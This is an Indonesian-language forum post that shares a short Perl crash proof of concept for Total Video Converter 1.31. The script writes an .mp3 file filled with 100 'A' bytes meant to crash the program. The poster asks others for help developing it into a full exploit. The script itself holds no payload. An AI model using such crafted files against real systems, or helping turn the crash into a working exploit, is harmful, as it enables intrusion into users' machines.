[Share & Help] Total Video Converter v1,31 Crash PoC (Perl Code)
#1
ini saya berbagi code sederhana, dan mohon bantuan untuk melanjutkan exploit ini

Code:
#!/usr/bin/perl
# Title     : Total Video Converter v.1.31 Crash PoC (Perl Code)
# Author    : h3ll0s
# Download  : ftp://ftp.telus.net/pub/winsite/winxp/video/tvpsetup.exe
# Tested    : Windows XP Service Pack 2
# Referensi : http://1337day.com/exploits/18702

my $file= "h3ll0s.mp3";
my $junk= "\x41" x 100;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);

print "File Telah Di buat\n";


Messages In This Thread




Users browsing this thread: 1 Guest(s)